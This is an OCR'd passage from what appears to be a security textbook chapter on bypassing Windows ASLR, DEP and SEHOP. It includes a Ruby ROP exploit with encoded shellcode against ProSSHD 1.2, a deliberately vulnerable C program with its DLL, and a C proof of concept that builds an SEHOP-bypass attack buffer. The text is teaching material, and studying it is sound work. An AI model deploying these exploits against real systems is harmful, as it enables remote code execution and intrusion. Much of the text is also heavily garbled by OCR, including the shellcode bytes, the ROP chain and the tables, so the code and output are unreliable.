When run against the wsshd.exe process, the following table is provided on the log 
page: 



log 

Addrt.ua 

0BADF00D 

HHonnttin 

0BADF00D 

0BADF09D 

UHHIUHUI) 

MBADP00D 

0BADF00D 

ftnunmnn 

0DADF00D 

HBADFWWD 

0BADP00D 

0BADF00D 

MHADFMND 

0BADF00D 

0BADF00D 

HMDMMD 

0BADF0HD 

0BADF00D 



IWnui 

““ 1*1 Gathering executable s loaded nodule info, plcaoc wait... 

*• I ♦ I Don#. 41 nodules found 

Loaded nodules - ASLR protection status : 



- MxVbliSMOHH 

> 0x75880000 

> 0*?7t 00000 

• HxVEHbUMMM 
0x75 ha 0000 

■ 0x71670000 

• HvVVhMMHHM 

• 0x77ae0000 

• 0x75 lo 0000 



0x751.71.000 : upphelp.dll - tBasePixuuf <C:\UinduwvVsysleH32\«pp>i«;lp.dll ) > : ASLR ENABLED 



Hx75r.8E.000 
0x77d2100H 
0x76V5cU4IM 
0x75 hoc 000 
0x71683000 
0x 77c 3c 000 
0x77af 7000 
0x75105000 



ushtp6.dll 
kcrnel32.dll 
ncucrt.dll 
CRYPT BASE .dll 



sechost.dll 

wehtcpip.dll 



ipt <C:\Uindnus\Syat«i*12\uaMpfi .d 1 1 > : ASLR FHABI.FD 
♦DoscPixup* <C:sWlndowsNi yatcn32Nkerne 132.dll) : ASLR LNADLED 
TBacaFixupf <C - \WindowcVcycton32Vncvcrt .d 1 1 > S ASLR ENABLED 

TBaseFlxupt <C;\Ulndov8\ay5ton32\CRYPTBASE.dll> : ASLR ENABLED 
f BoacFixupf <CisWindow 3 S3yatcn32\dwnupi.dll> > ACLR ENABLED 
BaseFixupf <C:\Uindous\SY$TEH32Vntd 1 1 dll) : ASLR ENABLED 
•BasePlxupt <C: \Windows \SYSTEM32\sechost .dll) . ASLR FNABLED 
f BaoePixupf <C:\Uindow«sSyoten32Vwohtcpip.dll> : ASLR ENABLED 



■ 0x77800000 - 0x7780a00H : LPK.U11 - tBasePixuy! <C:\Vimluw-,\ ; .y,len32\LPK.d 1 1> ; ASLR ENABLED 
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As we can see, the MSVCR71 .dll module is not protected with ASLR. We will use that 
in the following example to bypass DER 




NOTE This method doesn’t really bypass ASLR, but for the time being, as long 
as developers continue to produce code that is not ASLR protected, it will 
be a viable method to at least “avoid” ASLR.There are other options, such as 
guessing the address (possible due to lack of entropy in the random address 
and the fact that module addresses are randomized once per boot), but this is 
the easiest method. 



Bypassing DEP 

To demonstrate bypassing DEP, we will use the program we are familiar with, ProSSHD 
vl.2 from earlier in the chapter. Since that program was not compiled with /NXCOMPAT 
protection, we will enable it for the developers, using the editbin command within the 
Visual Studio command shell: 



SI Visual Studio Command Prompt (2010) |-o-H-Q~ Iwofl 

C:\Users\Public\Program Files\Lab-NC\ProSSHD>editbin /NXCOMPAT wsshd.exe 
Microsoft <R> COFF/PE Editor Ucrsion 10.00.30319.01 
Copyright <C> Microsoft Corporation. All rights reserved. 




NOTE If you already have that program running or attached to a debugger, 
you will need to close it before using the editbin command. 



At this point, it is worth noting that if we use the same exploit we used before, it will 
not work. We will get a BEX: C0000005 error (DEP Protection Fault) as follows: 



wsshd.exe 1 -ct | 1 S 

■ il wsshd.exe has stopped working 

Windows can check online for a solution to the problem. 

4 Check online for a solution and close the program 
+ Close the program 



dN Hide problem details 



Problem Event Name: 


BEX 


* 


Application Name: 


wsshd.exe 




Application Version: 


OjOjOjO 


i 


Application Timestamp: 


4ac23695 


Fault Module Name: 


StackHash d7bd 




Fault Module Version: 


OjOjOjO 




Fault Module Timestamp: 


00000000 




Exception Offset 


0012ef88 




Pvrpntion C nHp- 


ronmwK 




4 


rr i 
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VirtualProtect 

If a process needs to execute code in the stack or heap, it may use the VirtualAlloc or 
VirtualProtect function to allocate memory and mark the existing pages as executable. 

The API for VirtualProtect follows: 

BOOL WINAPI VirtualProtect ( 

in LPVOID IpAddress, 

in S I ZE_T dwSize, 

in DWORD f INewProtect , 

out PDWORD lpf lOldProtect 

) ; 

So, we will need to put the following on the stack and call VirtualProtect(): 

• IpAddress Base address of region of pages to be marked executable. 

• dwSize Size, in bytes, to mark executable; need to allow for expansion of 
shellcode. However, the entire memory page will be marked, so "1" may be used. 

• flNewProtect New protection option: 0x00000040 is PAGE_EXECUTE_ 

READWRITE. 

• lpflOldProtect Pointer to variable to store the old protection option code. 

Using the following command, we can determine the address of pointers to 
VirtualProtectQ inside MSVCR71.dll: 

Ipvefindaddr ropcall MSVCR71.dll 

This command will provide the output in a file called ropcall.txt, which can be 
found in the following folder: 

C : \Users\<your name here>\AppData\Local\VirtualStore\Program Files\Immunity 
Inc\ Immunity Debugger 

The end of that file shows the address at 0x7c3528dd. 

Return-Oriented Programming 

So, what can we do if we can't execute code on the stack? Execute it elsewhere? But 
where? In the existing linked modules, there are many small segments of code that are 
followed by a RETN instruction that offer some interesting opportunities. If you call 
such a small section of code and it returns to the stack, then you may call the next small 
section of code, and so on. This is called return-oriented programming (ROP) and was 
pioneered by Hovav Shacham and later used by Dino Dia Zovi (see the "References" 
section). 

Gadgets 

The small sections of code mentioned in the previous section are what we call gadgets. 

We use the word "code" here because it does not need to be a proper assembly instruc- 
tion; you may jump into the middle of a proper assembly instruction, as long as it 
performs the task you are looking to perform and returns execution to the stack after- 
ward. Since the next address on the stack is another ROP gadget, the return statement 
has the effect of calling that next instruction. This method of programming is similar to 
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Ret-to-LibC, as discussed in Chapter 12, but is different because we will rarely call 
proper existing functions; we will use parts of their instructions instead. 

ROP on Stack 



7C3SF1FB 


59 




I7C35F1FC 


C3 


I RETN 


1 7C3411SE 


33ca 


XOR FAX. FAX 


[|7T/Ml lf>H 


C3 


RFTH 


I7C35F21A 


83C4 0C 




|7C3SF21D 


C3 


REIN 


1 | 7C35F126 

1 |7C35F127 


5E 




rs 


|REIN 



Buffer Overflow 



0x7C35FlFB 



4 Bytes filler (POP) 



0x7C34115E 



0x7C35F21A 



Saved RET 



12 Bytes filler (ADD) 
0x7C35F126 



As can be seen, if there is a POP or other instruction that will modify the stack, then 
those bytes will need to be added as filler so that that next ROP instruction can be 
called during the next RETN instruction. 

The location of the beginning of the chain needs to be stored in eip and executed. 
If the beginning of the chain is already at the top of the stack, then simply overwriting 
saved eip with a pointer to RETN will do. Otherwise, a call may be required to pivot 
onto the stack. 



Exploit Sandwich with Gadgets as the Meat 

Using the following pvefindaddr command, we can find a list of recommended gad- 
gets for a given module: 

! pvefindaddr rop -m msvcr71.dll -n 

This command and arguments will create three files: 

• A "progress" file so you can see what the routine is doing (think of it as a 
status update file). If you open this file in notepad++, then you can simply 
reload it to see updates. 

• The actual rop file (will have the module name and version if you use the 
-m module filter). 

• A file called rop_stackpivot.txt, which will only contain stack pivot instructions. 

More info about the function and its parameters can be found in the pvefindaddr usage 
page (see "References" for the pvefindaddr wiki). 

The command will take a while to run and will produce the output files in the fol- 
lowing folder: 

C : \Users\<your name here>\AppData\Local\VirtualStore\Program Files\Immunity 
Inc\ Immunity Debugger 

The contents of the very verbose rop file will look like this: 



Output generated by pvefindaddr vl . 32 corelanc0d3r - 
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http: //www. corelan.be: 8800 



Loaded modules 



Fixup | Base I Top I Size I SafeSEH | ASLR | NXCompat 

Modulename & Path 



NO | 0x70340000 | 0x70396000 | 0x00056000 | yes | NO I NO 

MSVCR71.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll 

NO | 0x10000000 | OxlOOCEOOO | OxOOOCEOOO | yes | NO | NO 

LIBEAY32.dll : C:\Users\Public\Program Files\Lab-NC\ProSSHD\LIBEAY32.dll 
NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO 

wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe 

yes | 0x76050000 | 0x76056000 | 0x00006000 | NO I yes | yes 

NSI.dll : C:\Windows\system32\NSI.dll 

...truncated... 

[+] Module filter set to 'msvcr71.dll' 



ROP gadgets - Relatively safe/basic instructions 



0x7C3410B9 : {POP} # MOV AL, BYTE PTR DS : [C38B7C37] # POP EDI # POP ESI # POP 

EBP # POP EBX # POP ECX # POP ECX # RETN [Module : MSVCR71.dll] 

0x70341 0C2 : {POP} # POP ECX # POP ECX # RETN [Module : MSVCR71.dll] 

...truncated... and so on...pages and pages of gadgets 

From this output, you may chain together gadgets to perform the task at hand, 
building the arguments for VirtualProtect and calling it. It is not quite as simple as it 
sounds; you have to work with what you have available. You may have to get creative. 

The following code by Alexey Sintsov does just that: 

# Based on original Exploit by S2 Crew [Hungary] 

# Special Thanks to Alexey Sintsov (dsecrg) for his example, advice, assistance 
%w{rubygems net/ssh net/scp} .each { |x| require x } 

username = 'testl' 
password = 'testl' 
host = '10.10.10.143' 
port - 22 

# msfpayload windows/exec cmd=calc.exe R | msfencode -b ' \x00\x0a\x20 ' -e 
x86/shikata_ga_nai -t ruby 

# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=l ) 
shell — 

"\x33\xc9\xbl\x33\xbd\xe3\x34\x37\xfb\xdb\xc6\xd9\x74\x24 " + 

" \xf 4\x5f \x31\x6f \x0f \x83\xef \xfc\x03\x6f \xe8\xd6\xc2\x07" + 

" \x06\x9f \x2d\xf 8\xd6\xc0\xa4\xld\xe7\xd2\xd3\x56\x55\xe3" + 

" \x90\x3b\x55\x88\xf 5\xaf \xee\xfc\xdl\xc0\x47\x4a\x04\xee" + 

" \x58\x7a\x88\xbc\x9a\xlc\x74\xbf \xce\xfe\x45\x70\x03\xfe" + 

" \x82\x6d\xeb\x52\x5a\xf 9\x59\x43\xef \xbf \x61\x62\x3f \xb4 " + 
"\xd9\xlc\x3a\x0b\xad\x96\x45\x5c\xld\xac\x0e\x44\xl6\xea" + 
"\xae\x75\xfb\xe8\x93\x3c\x70\xda\x60\xbf \x50\xl2\x88\xf 1" + 

"\x9c\xf 9\xb7\x3d\xll\x03\xf f\xfa\xc9\x76\x0b\xf 9\x74\x81" + 
"\xc8\x83\xa2\x04\xcd\x24\x21\xbe\x35\xd4\xe6\x59\xbd\xda" + 
"\x43\x2d\x99\xfe\x52\xe2\x91\xfb\xdf \x05\x76\x8a\x9b\x21" + 
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" \x52\xd6\x78\x4b\xc3\xb2\x2f \x74\xl3\xla\x90\xd0\x5f \x89" + 

" \xc5\x63\x02\xc4\xl8\xel\x38\xal\xla\xf 9\x42\x82\x72\xc8" + 

" \xc9\x4d\x05\xd5\xlb\x2a\xf 9\x9f \x06\xlb\x91\x79\xd3\xl9" + 

"\xfc\x7 9\x09\x5d\xf 8\xf 9\xb8\xle\xf f \xe2\xc8\xlb\x44\xa5" + 

" \x21\x56\xd5\x40\x46\xc5\xd6\x40\x25\x88\x44\x08\x84\x2f " + 

"\xec\xab\xd8\xa5" 

get_request = "\x41" * 492 + # buffer before RET addr rewriting 

########## ROP designed by Alexey Sintsov (dsecrg) ######################### 

# All ROP instructions from non ASLR modules (coming with ProSHHD distrib) : 

# MSVCR71.DLL and MFC 71 . DLL 

# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD 

# (MSVCR71.DLL) this make stack executable 

#### RET (SAVED EIP) overwrite ### 

"\x9F\x07\x37\x7C" + # MOV EAX, EDI/POP EDI/POP ESI/RETN ; EAX points to our stack 

data with some offset (COMMENT A) 

n \xll\xll\xll\xll" + # JUNK AAA AAA 

" \x23\x23\x23\x23" + # JUNK AAA 

"\x27\x34\x34\x7C" + # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10 

"\x33\x33\x33\x33" + # JUNK AAA 



"\xCl\x4C\x34\x7C" 


+ 


# 

§ 


POP 


EAX 


/ 


RETN 


"\x33\x33\x33\x33" 


+ 


w 

# 




AAA 






"\x33\x33\x33\x33" 


+ 


# 




AAA 






M \x33\x33\x33\x33" 


+ 


# 




AAA 






"\x33\x33\x33\x33" 


+ 


# 




AAA 






" \xC0\xFF\xFF\xFF" 


+ 


ff 

# 


— 


.AAA 


Param : 


"\x05\xle\x35\x7C" 


+ 


# 


NEG 


EAX 


/ 


RETN 


# COMMENT B in following line 






,, \xc8\x03\x35\x7C" 


+ 


# 


MOV 


DS: 


[ECX] , Ei 


,, \x4 0\xa0\x35\x7C" 


+ 


# 


MOV 


EAX, 


, ECX / 1 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ 


RETN 


#COMMENT C in following 


line 






"\x08\x94\xl6\x7C" 


+ 


# 


MOV 


DS: 


[EAX+0x4 


"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 


"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 


"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 


"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 



EAX will be 0x40 (3rd param) 

/ RETN ; save 0x40 (3rd param) 
N ; restore pointer in EAX 

Change position 



#COMMENT D in following line 
" \xB2\x01\xl5\x7C M + # MOV [EAX+0x4], 1 



; EAX=ECX-0x0c 

EAX / RETN ; save &shellcode (1st param) 
; oh ... and move pointer back 

; EAX=ECX-0x8 

; size of shellcode (2nd param) 
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M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ RETN ; Change position for 


oldProtect 


" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






M \xAl\xlD\x34\x7C M 


+ 


# 


DEC 


EAX 


/ RETN 






" \xAl\xlD\x34\x7C" 


+ 


# 


DEC 


EAX 


/ RETN 






"\x27\x34\x34\x7C" 


+ 


# 


MOV 


ECX, 


, EAX / MOV EAX, 


ESI / POP ESI / 


RETN 10 


"\x33\x33\x33\x33" 


+ 


# 


JUNK 




AAA 




"\x40\xa0\x35\x7C" 


+ 


# 


MOV 


EAX, 


, ECX / RETN 


; restore pointer 


"\x33\x33\x33\x33" 


+ 


# 












"\x33\x33\x33\x33" 


+ 


# 












"\x33\x33\x33\x33" 


+ 


# 












"\x33\x33\x33\x33" 


+ 


# 












"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 


; and again. . . 




"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 






"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 






"\xB9\xlF\x34\x7C" 


+ 


# 


INC 


EAX 


/ RETN 






# COMMENT E in following line 








" \xE5\x6B\x36\x7C" 


+ 


# 


MOV 


DS: 


[EAX+0xl4] , ECX 


; save oldProtect 


(4th param) 



M \xBA\xlF\x34\x7C" * 204 + # RETN fill just like NOP sled (ROP style) 

# COMMENT F in following line 

" \xDD\x28\x35\x7C" + # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / POP 

ESI / POP EBX / RETN ; Call VirtualProtect 

"AAAABBBBCCCCDDDD" + # Here is placeholder for params (VirtualProtect) 

####################### return into stack after VirtualProtect 

M \x30\x5C\x34\x7C M + # 0x7c345c2e : ANDPS XMMO, XMM3 -- (+0x2 to address and....) 

— > PUSH ESP / RETN 

"\x90 M * 14 + # NOPs here is the beginning of shellcode 

shell # shellcode 8) 

# lets do it . . . 

Net :: SSH. start ( host, username, rpassword => password) do|ssh| 

# sleep (15) # gives us time to attach to wsshd.exe 

ssh. scp. download ! ( get_request, "foo.txt") # 2 params: remote file, local file 
end 

Although following this program may appear to be difficult, when you realize that 
it is just a series of calls to areas of linked modules that contain valuable instructions 
followed by a RETN that simply calls the next gadget of instructions, then you see the 
method to the madness. There are some gadgets to load the register values (preparing 
for the call to VirtualProtect). There are other gadgets to increment or decrement regis- 
ter values (again, adjusting them for the call to VirtualProtect). There are some gadgets 
that consume bytes on the stack with POPs, for example; in those cases, space is pro- 
vided on the stack. 
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In this case, the attacker noticed that just after overwriting saved RETN on the stack, 
the ESI register points to some location further down the stack (see Comment A in the 
preceding code). Using this location, the third argument is stored for the VirtualProtect 
function (see Comment B). Next, the first, second, and fourth arguments are written to 
the stack (see Comments C, D, E, respectively). Notice that the size of the memory seg- 
ment to mark as executable is "1" (see Comment D); this is because the entire memory 
page of that address will be marked with the VirtualProtect function. When all the ar- 
guments are stored, then the VirtualProtect function is called to enable execution of 
that memory page (see Comment F). Throughout the process, EAX and ECX are used to 
point to the location of the four parameters. 

As you can see, setting up the stack properly can be compared to assembling a pic- 
ture puzzle: when you move one piece, you may move other pieces, which in turn may 
move other pieces. You will have to think ahead. 

Notice the order in which the arguments to VirtualProtect are built: 3, 1, 2, 4. This 
is not normal programming because we are "not in Kansas" any more. Welcome to the 
world of ROP! 

Alexey used ROP to build the arguments to VirtualProtect on-the-fly and load them 
in the placeholder memory slots on the stack, just after the call to VirtualProtect (where 
arguments belong). After the arguments placeholder goes the address of the next func- 
tion to be called, in this case one more ROP statement, to return onto the stack and 
execute our shellcode. 

If we launch this new code against our DEP (/NXCOMPAT) protected program, 
wsshd.exe, we find that it actually works! We are able to pop a calculator (in this case) 
on a DEP-protected process. Great! 

Bypassing SEHOP 

As previously mentioned, the team from Sysdream.com developed a clever way to by- 
pass SEHOP by reconstructing a proper SEH chain that terminates with the actual sys- 
tem default exception handler (ntdlllFinalExceptionHandler). It should be noted at 
the outset that this type of attack only works under limited conditions when all of the 
following conditions are met: 

• Local system access (local exploits) 

• memcpy types of vulnerabilities where NULL bytes are allowed 

• When the third byte of the memory address of the controlled area of the stack 
is between 0x80 and OxFB 

• When a module/DLL can be found that is not SafeSEH protected and contains 
the following sequence of instructions (this will be explained in a moment): 

• XOR [register, register] 

• POP [register] 

• POP [register] 

• RETN 
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As the Sysdream team explained, the last requirement is not as hard as it sounds — 
this is often the case at the end of functions that need to return a zero or NULL value; 
in that case, EAX is xor'ed and the function returns. 




NOTE You can use Ipvefindaddr xp or xpl or xp2 to find SEHOP bypass 
pointers (xor, pop, pop, ret) in a given module. 



As shown in Figure 15-5, a fake SEH chain will be placed on the stack, and the last 
record will be the actual location of the system default exception handler. 

The key difference between this technique and the traditional SafeSEH technique is 
the use of the JE (74), conditional jump if equal to zero, operated instead of the tradi- 
tional JMP short (EB) instruction. The JE instruction (74) takes one operand, a single 
byte, used as a signed integer offset. Therefore, if you wanted to jump backward 10 bytes, 
you would use a 74 F7 opcode. Now, since we have a short assembly instruction that 
may also be a valid memory address on the stack, we can make this attack happen. As 
shown in Figure 15-5, we will overwrite the "Next SEH" pointer with a valid pointer to 
memory we control and where we will place the fake SEH record, containing an actual 
address to the system default exception handler. Next, we will overwrite the "SEH han- 



f 



XORE/i 

POP 

POP 

RE 


iX. EAX 
EAX 
EAX 
:T 







SEH Chain 
Execution flow 
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EB 08 

0x0Q12 iF774| 



0x004018! 1 



OxFFFFFFFF 



rtdll'FinalExcepftonMandlor 



Jmp 8 
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Start 



Jmp 8 
Next SEH 
SEH handler 



Shellcode 



Figure 15-5 Sysdream.com technique to bypass SEHOP (used with permission) 
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dler" pointer with an address to the XOR, POP, POP, RETN sequence in a module/DLL 
that is not SafeSEH protected. This will have the desired effect of setting the zero bit in 
the special register and will make our JE (74) instruction execute and jump backward 
into our NOP sled. At this point, we will ride the sled into the next instruction (EB 08), 
which will jump forward, over the two pointer addresses, and continue in the next NOP 
sled. Finally, we will jump over the last SEff record and into the real shellcode. 

To summarize, our attack sandwich in this case looks like this: 

• NOP sled 

• EB 08 (may need to use EB 0A to jump over both addresses) 

• Next SEH: address we control on stack ending with [negative byte] 74 

• SEE! handler: address to an XOR, POP, POP, RETN sequence in a non-SafeSEff 
module 

• NOP sled 

• EB 08 (may need to use EB 0A to jump over both addresses) 

• At address given above: OxFFFFFFFF 

• Actual system default exception handler 

• Shellcode 

To demonstrate this exploit, we will use the following vulnerable program (with 
SafeSEH protection) and associated DLL (no SafeSEH protection): 




NOTE Although a canned program, it is indicative of programs found in 
the wild. This program will be used to bypass / GS, SafeSEH, and SEHOP 
protections. 



// fool.cpp : Defines the entry point for the console application. 

#include "stdafx.h" 

#include "stdio.h" 

#include "windows. h" 

extern "C" declspec (dllimport) void test(); 

void Getlnput (char* str, char* out) 

{ 

long ISize; 
char buffer [500]; 
char * temp; 

FILE * hFile; 
size_t result; 
try { 

hFile = fopen(str, "rb") ; //open file for reading of bytes 
if (hFile==NULL) {printf("No such file"); exit(l);} //error checking 
//get size of file 
fseek (hFile, 0, SEEK_END) ; 

ISize = ftell (hFile) ; 
rewind (hFile) ; 

temp = (char*) malloc (sizeof (char) *lSize) ; 

result = f read (temp, 1 , ISize, hFile) ; 

memcpy (buffer , temp, result); //vulnerability 
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memcpy (out, buffer , strlen (buffer )) ; //triggers SEH before /GS 
printf (" Input received : %s\n", buffer) ; 

} 

catch (char * strErr) 

{ 

printf ("No valid input received ! \n"); 
printf ( "Exception : %s\n" , strErr ) ; 

} 

test(); //calls DLL, demonstration of XOR, POP, POP, RETN sequence 

} 

int main(int argc, char* argv[]) 

{ 

char foo [2048] ; 
char buf 2 [500] ; 

Getlnput (argv [ 1 ] , buf 2 ) ; 
return 0; 

} 



Next, we will show the associated DLL of the fool.c program: 

// foolDLL.cpp : Defines the exported functions for the DLL application. 

//This DLL simply demonstrates XOR, POP, POP, RETN sequence 

//may be found in the wild with functions that return a Zero or NULL value 

#include "stdafx.h" 

extern "C" int declspec (dllexport ) test(){ 

asm 

{ 

xor eax, eax 
pop esi 
pop eb 
retn 



This program and DLL may be created in Visual Studio 2010 Express (free version). 
The main fool.c program was compiled with /GS and /SafeSEH protection (which 
adds SEHOP), but no DEP (/NXCOMPAT) or ASLR (/DYNAMICBASE) protection. The 
DLL was compiled with only /GS protection. 




NOTE The fool and foo I dll files may be compiled from the command line 
by removing the reference to stdafx.h and using the following command-line 
options: 

cl /LD /GS foolDLL.cpp /link /SafeSEH: no /DYNAMICBASE : no /NXCompat:no 

cl /GS /EHsc fool.cpp f oolDLL . lib /link /SafeSEH /DYNAMICBASE : no /NXCompat:no 



After compiling the programs, let's look at them in OllyDbg and verify the DLL 
does not have /SafeSEff protection and that the program does. We will use the 
OllySSEH plug-in, shown next, which you can find on the Downloads page at 
OpenRCE.org. 
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File View Debug | Plugins ) Options Window Help 

B|«|X| ►|||| 1 Bookmarics ► l|jj j«|ljw| H]c]./J K] jjj jUld-ll 1=|2!|U 

[c] CPU - mam thret 2 Command line ► I 



pSCJE^nTTW 



Jmi- s 

I* /SafeSEH Module Scanner 



3 SafeSEH 

' MniTcno cco — 



Scan /SafeSEH Modules 
About 



SEH node 




Lin It 


Module version | Module None 


SafeSEH on 

-SafeSEH ON 
-'SafeSEH ON 
/'SafeSEH OH 
/'SafeSEH ON 

/SafeSEH OFF 


0x400000 

0x77*50000 

0xSb88O000 

0k7Sc20000 

0x76210000 

0x10000000 


0M40C000 
Ox 77b 80000 
I.T L :»t 2000 
0* 7506*000 
0x762e40O0 
0Ml001bOO0 


Cs^loovlool.exe 

6. 1 . 7600. 16385 (win7_rtn.090713 CsMUindowiNSVSTErt32Nntdll.dll 
1 0 . 00 . 303 1 9 . 1 Cs Mil l ndows 4tew32NMSUCR100O.dll 

6.1.7600.16385 lwm7_rtn.090713 Cl MihndowiN»y»ter.32NKERHELBftSE.dl l 
6.1.7600.16385 lwin?_rtn.090713 Ci Mxlmdowi sy ater»32 N 4ceme 1 32. d 1 1 

| Ci ' f ooNf oolDLL. d 1 1 



Next, let's search for the XOR, POP, POP, RETN sequence in our binary. 



Bj^|x| llj ^ Jd 



C] CPU - main thread, m 


odule fool DLL 


1001 13?E 


33C0 


XOR ERX.EflX 


10011388 


5E 


POP ESI 


10011381 


50 


POP EBP 


10011382 


C3 


RETN 


loo ii soil 


5E 


TOP ESI 




50 


POP EBP 


1001 1 385 


5C 


POP ESP 


10011 386 | 


C3 


RETN 


1001 1387 1 


5F 


POP EDI 



Ej«jTl W l H| c| ./ J KjBjHjd Sj 

Find sequence of commands 




ill 



? 




NOTE There are good plug-ins for OllyDbg and Immunity Debugger that do 
this search for you. If interested, go to Corelan.be reference and search for 

the pvefindaddr plug-in. 



Now, using the address we discovered, let's craft the exploit sandwich in a program, 
which we will call sploit.c. This program creates the attack buffer and writes it to a file, 
so it can be fed to the vulnerable program. This code is based on the Sysdream.com 
team code but was heavily modified, as mentioned in the credit comment of code. 



#include <stdio.h> 
#include <stdlib.h> 
#include <windows.h> 



/* 

Credit: Heavily modified code from: 

Stefan LE BERRE (s.leberre@sysdream.com) 

Damien CAUQUIL (d.cauquil@sysdream.com) 
http : / /ghostsinthestack . org/ 
http : / / virtualabs . f r/ 
http : / / sysdream . com/ 

*/ 

// finding this next address takes trial and error in ollydbg or other debugger 
char nseh[] = M \x74\xF4\xl2\x00 M ; //pointer to OxFFFFFFFF, then Final EH 
char seh[] = "\x7E\xl3\x01\xl0"; //pointer to xor, pop, pop, ret 

/* Shellcode size: 227 bytes */ 

char shellcode [] = M \xb8\x29\xl5\xd8\xf7\x29\xc9\xbl\x33\xdd" 
M \xc2\xd9\x74\x24\xf4\x5b\x31\x43\x0e\x03 M 
M \x43\x0e\x83\xea\xll\x3a\x02\xl0\xf l\x33" 
M \xed\xe8\x02\x24\x67\x0d\x33\x76\xl3\x46 M 
"\x66\x4 6\x57\x0a\x8b\x2d\x35\xbe\xl8\x43" 
"\x92\xbl\xa9\xee\xc4\xfc\x2a\xdf \xc8\x52" 
"\xe8\x41\xb5\xa8\x3d\xa2\x84\x63\x30\xa3" 
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M \xcl\x99\xbb\xf I\x9a\xd6\x6e\xe6\xaf \xaa" 
" \xb2\x07\x60\xal\x8b\x7f \x05\x75\x7f \xca" 
M \x04\xa5\xd0\x41\x4e\x5d\x5a\x0d\x6f \x5c M 
" \x8f \x4d\x53\xl7\xa4\xa6\x27\xa6\x6c\xf 7 " 
M \xc8\x99\x50\x54\xf 7\xl6\x5d\xa4\x3f \x90" 
" \xbe\xd3\x4b\xe3\x43\xe4\x8f \x9e\x9f \x61 " 
" \xl2\x38\x6b\xdl\xf 6\xb9\xb8\x84\x7d\xb5" 
M \x75\xc2\xda\xd9\x88\x07\x51\xe5\x01\xa6" 
M \xb6\x6c\x51\x8d\xl2\x35\x01\xac\x03\x93" 
" \xe4\xdl\x54\x7b\x58\x74\xle\x69\x8d\x0e M 
M \x7d\xe7\x50\x82\xfb\x4e\x52\x9c\x03\xe0" 
M \x3b\xad\x88\x6f\x3b\x32\x5b\xd4\xa3\xd0 n 
" \x4e\x20\x4 c:\x4d\xlb\x89\xll\x6e\xf l\xcd M 
"\x2f \xed\xf 0\xad\xcb\xed\x70\xa8\x90\xa9" 
" \x6 9 \xc0\x89\x5 f:\x8e\x77\xa9\x75\xed\xl 6" 
"\x39\xl5\xdc\xbd\xb9\xbc\x20" ; 



DWORD f indFinalEH ( ) { 

return ((DWORD) (GetModuleHandle ("ntdll .dll" )) &0xFFFF0000) +0xBA875; //calc FinalEH 

} 

int main(int argc, char *argv[]){ 

FILE *hFile; //file handle for writing to file 

UCHAR ucBuf fer [4096] ; //buffer used to build attack 
DWORD dwFEH = 0; //pointer to Final Exception Handler 

// Little banner 

printf ( "SEHOP Bypass PoC\n M ) ; 

// Calculate FEH 

dwFEH = (DWORD) f indFinalEH () ; 

if (dwFEH) { 

// FEH found 

printf ("[ 1/3] Found final exception handler: 0x%08x\n" , dwFEH) ; 
printf (" [2/3] Building attack buffer ... "); 

memset (ucBuf fer , ' \x41 ' , 0x208) ; // 524 - 4 = 520 = 0x208 of nop filler 
memcpy (&ucBuffer [0x208] , "XxEBXxODXxOOXxOO" , 0x04) ; 
memcpy (&ucBuf fer [0x20C] , (void * ) &nseh, 0x04 ) ; 
memcpy (&ucBuf fer [0x210] , (void * ) &seh, 0x04 ) ; 

memset (&ucBuffer [0x214] , ' \x42 0x28) ; //nop filler 

memcpy (&ucBuf fer [0x23C] , "XxEBXxOAXxFFXxFFXxFFXxFFXxFFXxFF" , 0x8) ; //jump 10 
memcpy (&ucBuffer [0x244] , (void * ) &dwFEH, 0x4 ) ; 
memcpy (&ucBuf fer [0x248] , shellcode, 0xE3) ; 

memset (&ucBuf fer [0x32B] , ' \43 OxcdO) ; //nop filler 

printf ("doneXn" ) ; 

printf (" [3/3] Creating %s file ... \n" , argv [ 1] ) ; 
